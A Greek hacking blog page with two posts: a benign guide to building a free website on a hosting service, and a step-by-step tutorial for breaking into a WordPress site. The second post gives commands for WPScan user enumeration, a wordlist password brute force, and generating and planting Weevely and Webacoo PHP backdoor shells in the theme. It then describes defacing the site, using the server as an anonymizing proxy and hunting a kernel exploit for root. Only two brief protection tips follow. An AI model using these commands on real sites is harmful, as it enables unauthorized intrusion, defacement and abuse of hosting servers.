ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Σάββατο 28 Φεβρουαρίου 2015

Πως φτιαχνω δωρεαν μια ιστοσελιδα



Τι θα χρειαστειτε;

1.Συνδεση στο διαδικτυο


Πολλοι απο εσας θελουνε να φτιαξουνε μια ιστοσελιδα ωστε να προωθησουνε τι δουλεια τους αλλα δεν θελουνε να πληρωσουνε πολλα λεφτα εγω θα σας δειξω πως θα την φτιαξετε με 0 κοστος

Για να φτιαξετε μια ιστοσελιδα καταρχας περα απο την σχεδιαση χρειαζεστε:

1.Oνομα τομεα(Domain name)
2.Διακομηστη(server)


Το domain name ειναι το ονομα που θα μπορει καποιος να βρει την ιστοσελιδα δλδ το domain name του facebook ειναι facebook.com
Ο  server ειναι αυτος που θα εχει την ιστοσελιδα online αυτος που θα την φιλοξενει
Στη σχεδιαση θα αποφασισετε καταρχας αν η ιστοσελιδα σας ειναι στατικη η δυναμικη και πως θα ειναι εμφανισιακα:
Στατικη ιστοσελιδα λεμε την σελιδα που δεν μπορει ο χρηστης να αλληλεπιδραση δλδ τα δεδομενα της ιστοσελιδα ειναι αυτα που βλεπει και δεν αλλαζουν
Δυναμικη ειναι η ιστοσελιδα που αλλαζουν τα δεδομενα και αφηνουν τον χρηστη να αλληλεπιδρα
πχ στατικη θα φτιαξετε οταν εχετε μια καφετερεια η μαγαζι και θελετε απλα να βαλετε φωτογραφιες του χωρου σας ,τηλεφωνα επικοινωνιας κτλ ενω δυναμικη οταν θελετε να υπαρχει καποιο chat η να συνδεονται τα μελη με κωδικους,να αγοραζουν,να ανεβαζουν φωτογραφιες  και γενικα οι χρηστες να αλληλεπιδρουν.

Εγω θα σας δειξω ορισμενα παραδειγματα

Παταμε εδω ωστε να κανουμε εγγραφη

επιλεγετε Δημιουργια λογαριασμου η το σημα του facebook,google ωστε να γινει αυτοματα εγγραφη


οταν κανουμε εγγραφη τοτε στην αρχικη επιλεγουμε φιλοξενια


εδω θα δειτε τα πακετα παραγγελιας εμεις στο παραδειγμα θα επιλεξουμε δωρεαν αλλα εσεις αν το θελετε για επαγγελματικο σκοπο θα πρεπει να επιλεξετε προνομιουχος για να παρετε domain name σε .com οπως και να εχει εγω θα σας δειξω και του 2 τροπους


γραφουμε τι domain θελουμε να εχουμε και κωδικο


πχ εγω επελεξα nickthesail0r.zz.vc επιλεγω συνεχεια και γραφω το Captcha ωστε να αποδειξω οτι ειμαι ανθρωπος


μετα αποδεχομαι τους ορους και παραγγελια

 τωρα αν θελουμε να εχουμε το domain μας σε .com απλα στην αρχη επιλεγουμε προνομιουχος


επιλεγουμε καθε ποσο θελουμε να πληρωνουμε για να εχουμε αυτο το domain και τις προσθετες υπηρεσιες και επιλεγουμε συνεχεια


επιλεγουμε συνεχεια

Επιλεγουμε  Καταχωρηση νεου  Domain,γραφουμε το domain μας επιλεγουμε καταληξη .com,επιλεγουμε ελενχος για να δουμε αν ειναι διαθεσιμο ,βαζουμε κωδικο και συνεχεια


επιλεγουμε παραγγελια


κατω κατω επιλεγουμε τον τροπο πληρωμης

τωρα εφοσον εχουμε ητε δωρεαν η προνομιουχο θα μας πει οτι δημιουργηθηκε επιτυχως οποτε εμεις παταμε στο + και επιλεγουμε Διαχειριση

τωρα μας μενει να σχεδιασουμε την ιστοσελιδα οποτε πηγαινουμε κατω κατω που λεει ιστοσελιδα

Για απλη στατικη ιστοσελιδα επιλεγουμε κατασκευαστης ιστοσελιδας

επιλεγουμε καποιο απο τα ετοιμα προσχεδια που αντιπροσωπευει την επιχειρηση μας



πχ εγω ας υποθεσουμε οτι εχω ενα σουβλαντζιδικο θα επιλεξω αριστερα εκει που λεει φαγητο θα δω ενα απο τα ετοιμα προσχεδια
διαλεγω οποιο μου αρεσει και επιλογη

οποτε θα μας ανοιξει η σελιδα για επεξεργασια επιλεγουμε και επεξεργαζομαστε την σελιδα πχ


οταν τελειωσουμε επιλεγουμε προβολη ωστε να δουμε τι εχουμε κανει και αποθηκευση για να την δημοσιευσουμε


και οταν οι αγαπημενοι μας πελατες ψαξουν την επιχειρηση μας τοτε

*ασχετα με τι προσχεδιο επιλεξετε μπορειτε να αλλαξετε τα παντα στην επεξεργασια*
με το zero builder για να αλλαζετε τα δεδομενα στην ιστοσελιδα πρεπει να συνδεεστε στο hostinger και να κανετε επεξεργασια ενω πχ μπορειτε να επιλεξετε να εχει αλλο CMS (Content Managment System - συστημα διαχειρισης περιεχομενου οπως (wordpress,drupal,jοοmla κτλ)

τωρα για μια ιστοσελιδα wordpress πηγαινουμε ιστοσελιδα και επιλεγουμε αυτοματος φορτωτης

  κατω κατω που λεει διαχειριση περιεχομενου επιλεγουμε wordpress


βαζουμε τα στοιχεια μας και επιλεγουμε εγκατασταση


κανουμε μια ανανεωση της σελιδα και επιλεγουμε λεπτομεριες

επιλεγουμε το url του διαχειριστη


θα μας εμφανισει να βαλουμε τα κρητηρια συνδεσης μας

οταν βαλουμε τα κρητηρια τοτε μπορουμε να φτιαξουμε την ιστοσελιδα wordpress πχ


πηγαινουμε εμφανιση - θεματα


επιλεγουμε προσθηκη νεου


επιλεγουμε δημοφιλεστερα και αναλογα με την επιχειρηση μας επιλεγουμε εγκατασταση

πχ ας υποθεσουμε οτι εχω ενα εστιατοριο


επιλεγω εγκατασταση και μετα ενεργοποιηση
μετα επιλεγουμε προσαρμογη και φτιαχνουμε την σελιδα μας



επιλεξτε  με την ιδια διαδικασια στο αυτοματο φορτωτη joomla πηγαινετε στην url διαχειριστη


και αρχιζετε να φτιαχνετε την σελιδα σας


πχ αν εχω καποιο κινεζικο εστιατοριο


τωρα για δυναμικες ιστοσελιδες

για να φτιαξετε ενα forum επιλεγετε στο χτισιμο κοινοτητας ενα απο τα παρακατω πχ εγω επελεξα MyBB


πχ


αναλογα με τις αναγκες σας επιλεγετε οτι θελετε στον αυτοματο φορτωτη

για να φτιαξετε ενα eshop πχ επιλεγουμε το tomatocart κανουμε την ιδια διαδικασια μετα επεξεργασια κτλ

και



και ετσι ευκολα και γρηγορα εχετε φτιαξει την ιστοσελιδα που θελετε

Δευτέρα 23 Φεβρουαρίου 2015

Πως εισβαλουμε σε μια ιστοσελιδα WordPress και μετα στον server(WPScan + Weevely+Webacoo)



Τι θα χρειαστειτε;

1.Kali Linux


Το WPScan (WordPress Security Scanner) ειναι ενα εργαλειο το οποιο ανιχνευει για ευπαθειες στα προσθετα του WordPress 

Πρωτου ξεκινησουμε ανοιγουμε ενα τερματικο και γραφουμε

wpscan --update ωστε να ανανεωσει την βαση δεδομενων του wpscan


μετα επιλεγουμε την σελιδα που θελουμε να ανιχνευσουμε πχ εγω μετεφερα ολο το blog μου  σε WordPress σε αυτο το domain "dnsenum.pe.hu"

γραφουμε στο τερματικο

wpscan -url dnsenum.pe.hu


αρχικα βλεπουμε οτι βρηκε το αρχειο robots.txt αυτο το αρχειο με λιγα λογια λεει στα google bots που ανιχνευουνε ολο το internet τι να συμπεριλαβουν στην αναζητηση της google και τι οχι.

αν ανοιξουμε τον συνδεσμο

βλεπουμε οτι η διαδρομη /wp-admin/ δεν επιτρεπετε να εμφανιστει απο την google και καταλαβαινουμε οτι αυτη η διαδρομη ειναι η διαδρομη που συνδεετε ο διαχειριστης οποτε ας δουμε


τωρα εφοσον βρηκαμε το admin panel ας δουμε τι αλλο μπορει να βρουμε

στην διαδρομη/readme.html βρηκαμε γενικα πληροφοριες πως γινετε η εγκατασταση κτλ 

στην διαδρομη /xmlrpc.php βλεπουμε οτι δεχετε μονο post request


βλεπουμε οτι η ιστοσελιδα ειναι βασισμενη σε εκδοση WordPress 4.1 ,σε apache server και php/5.5.21 
και εδω βλεπουμε κατι αλλο σημαντικο απο το theme plugin


το user id και ολη την διαδρομη που εχει ο server 

εδω βλεπετε καποιες ευπαθειες που βρηκε αν επιλεξετε στο reference θα δειτε πως να εκμεταλευτειτε αυτες τις ευπαθειες


απο ολες αυτες τις πληροφοριες πχ διαλεγουμε το login panel

οποτε για να παρουμε προσβαση πρεπει να βρουμε το ονομα χρηστη
τρεχουμε σε ενα τερματικο την εντολη

wpscan --url http://dnsenum.pe.hu/wp-login/ --enumerate u


βλεπουμε οτι το ονομα χρηστη ειναι admin

τωρα για να βρουμε τον κωδικο απλα τρεχουμε την εντολη

wpscan --url dnsenum.pe.hu --wordlist /root/lexika/user.lst --username admin

οπου
--wordlist η διαδρομη που εχουμε το λεξικο μας


και καθως εχουμε βρει ονομα χρηστη και κωδικο συνδεομαστε


τωρα καθως συνδεθηκαμε θα ανεβασουμε ενα backdoored shell στη σελιδα με το weevely
ανοιγουμε ενα τερματικο και γραφουμε

weevely generate kodikos /root/Desktop/weevely

οπου

kodikos βαζετε τον κωδικο σας και μετα ακολουθει η διαδρομη που θελετε να δημιουργηθει


τωρα εφοσον το εχουμε δημιουργησει θα γραψουμε στο τερματικο

nano /root/Desktop/weevely


 αντιγραφουμε ολο τον κωδικα και κλεινουμε το τερματικο

 παμε παλι στο wordpress επιλεγουμε εμφανιση ,επεξεργασια και Κεφαλιδα
*η σε ενα προσθετο και προσθετουμε τον κωδικα κατω κατω


 στο τελος του κωδικα βαζουμε τον κωδικα του weevely που αντιγραψαμε ποιο πριν και επιλεγουμε Ενημερωση αρχειου

τωρα ανοιγουμε ενα τερματικο και γραφουμε

weevely http://dnsenum.pe.hu kodikos


και εχουμε παρει προσβαση στον server


με την εντολη :help μπορουμε να δουμε τις επιλογες που εχει το weevely

πχ


με το weevely γενικα μπορειτε να κανετε πολλα πραγματα πχ ας πουμε οτι θελω να κανω ενα απλο deface της σελιδας φτιαχνω εναν απλο αρχειο με html κωδικα και το ανεβαζω με την εντολη
:file.upload /root/Desktop/index.html index.php
 *η οποια αυτη η εντολη ανεβαζει το index.html και το ονομαζει σε index.php που στην ουσια κανει αντικατασταση*
 η με την εντολη :file.edit index.php -editor nano
κανω επεξεργασια του αρχειου και βαζω τον κωδικα

πχ το deface εγινε απο τον ΜοχθυρHacker κτλ

Γενικα το deface ειναι ανουσιο και χαζο να γινεται σε μια ιστοσελιδα
υπαρχουν  καλυτεροι τροποι να χρησιμοποιησεις μια ιστοσελιδα και γενικα εναν server ,οπως να σερφαρεις με την ip του server


τρεχουμε  την εντολη :net.proxy


μετα πηγαινουμε και βαζουμε σαν proxy 127.0.0.1:8081 στο iceweasel


και σερφαρουμε  ,κοιταξτε οτι η ip ειναι του server


και παμε για να δουμε το dns leak.
εδω οπως βλεπετε παρολο που λεει οτι υπαρχει dns leak σερφαρω ανωνυμα καθως καμια απο τις 2 ip ειναι δικια μου

βεβαια σε ιστοσελιδες https δεν μπορουμε να σερφαρουμε γιαυτο για αναζητηση διαλεξτε το bing ωστε να σας κανει αναζητηση που ειναι http
μπορειτε να χρησιμοποιησετε αλλα εργαλεια οπως nmap,wpscan κτλ μεσου αυτου του proxy
επισης μπορειτε να παρετε προσβαση σε αλλες ιστοσελιδες εφοσον "πατανε" στον ιδιο server αλλα για να το κανετε αυτο πρεπει να εχετε πληρη δικαιωματα στον server
*γιαυτο και στην αρχη το weevely λεει  "[shell.php] [!] Error: skipping invalid response: '.../public_html/weevely.php(9) : runtime-created function(1) : eval()'d code</b> on line <b>1</b><br />'"

τρεχουμε την εντολη :system.info
και βλεπουμε οτι εχουμε δικαιωματα user "u103280962"


βλεπουνε οτι ο server ειναι  Linux  3.2.55-grsec οποτε ψαχνουμε να βρουμε μια ευπαθεια για αυτον ωστε να παρουμε δικαιωματα root
παταμε εδω
οταν βρουμε την ευπαθεια την κατεβαζουμε(διαβαζουμε τις οδηγιες κτλ)
γραφουμε cd /tmp/
την ανεβαζουμε και τρεχουμε την ευπαθεια στην /tmp/ διαδρομη

Ενα ενναλακτικο προγραμμα για να ανεβαζετε shell σε ιστοσελιδες και να περνετε προσβαση στον server ειναι το webacoo βεβαια δεν ειναι τοσο κρυφο αλλα κανει την δουλεια του

Για να δημιουργησουμε το  backdoored  γραφουμε στο τερματικο

webacoo -g -o /root/Desktop/backdoor.php

κανουμε  την ιδια διαδικασια που καναμε και με το weevely (δλδ να αντιγραψουμε τον κωδικα σε ενα προσθετο η στο θεμα)

για να το τρεξουμε γραφουμε στο τερματικο

webacoo -t -u http://dnsenum.pe.hu/backdoor.php


 Πως θα προστατευτειτε;

1.Παντα να κανετε αναβαθμιση των προσθετων που εχετε στη WordPress ιστοσελιδα σας
2.Να εχετε προσθετα τα οποια βοηθανε στην ασφαλεια της ιστοσελιδας σας